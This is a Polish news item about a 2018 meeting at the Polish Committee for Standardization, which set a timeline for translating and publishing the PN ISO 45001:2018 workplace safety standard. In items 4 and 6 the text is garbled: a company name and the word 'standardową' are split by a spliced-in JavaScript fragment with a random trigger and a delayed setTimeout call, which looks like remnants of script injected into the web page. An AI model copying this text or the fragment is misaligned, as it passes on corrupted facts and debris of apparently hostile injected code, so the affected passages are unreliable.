Prace nad tłumaczeniem i publikacją normy PN ISO 45001:2018.

W dniu 12.10. 2018r. w Polskim Komitecie Normalizacyjnym w Warszawie odbyło się spotkanie przedstawicieli Komitetu Technicznego 276 ds. zarządzania bezpieczeństwem i higieną pracy przy PKN, Centralnego Instytutu Ochrony Pracy Państwowego Instytutu Badawczego oraz Stowarzyszenia Polskie Forum ISO 45000. Przedmiotem spotkania były prace nad tłumaczeniem i publikacją normy PN ISO 45001:2018.

Ustalono co następuje:

  1. Stowarzyszenie Polskie Forum ISO 45000 skieruje do PKN wniosek w celu rozpoczęcia procedury uzgodnienia ostatecznej polskojęzycznej wersji normy PN ISO 45001:2018r.
  2. Rzeczowy wniosek wysłano dnia 17.10.2018r.
  3. Do dnia 07.11.2018r. przeprowadzone zostanie głosowanie w celu uzyskania pozytywnej opinii Komitetu Technicznego 276 w zakresie tłumaczenia normy na język polski.
  4. Jako materiał do prac posłuży wersja przetłumaczona przez grupę roboczą Stowarzyszenia Polskie Forum ISO 45000 , w której uczestniczyli przedstawiciele firm KGHM Polska Miedź S.A. Oddział Huta Miedzi „Głogów”; Johnson Electric Polandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Sp. z o.o.; PCC Rokita SA; Zakłady Pomiarowo-Badawcze Energetyki; „ENERGOPOMIAR” Sp. z o.o.; ENERGA-OPERATOR SA; PGE GiEK S.A. Oddział Elektrownia Bełchatów oraz PKN Orlen SA.
  5. Prace przedstawicieli Komitetu Technicznego 276  ds. zarządzania bezpieczeństwem i higieną pracy przy Polskim Komitecie Normalizacyjnym nad ostateczną wersją polskiej normy PN ISO 45001:2018r. przewidywane są na okres grudzień – luty 2019r.
  6. W dalszej kolejności w okresie  marzec – maj 2019r ,PKN przeprowadzi standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardową procedurę weryfikacji, opracowania szaty graficznej i wymaganych prac przed publikacją.
  7. Planowana publikacja normy PN ISO 45001:2018 w języku polskim planowana jest w czerwcu 2019.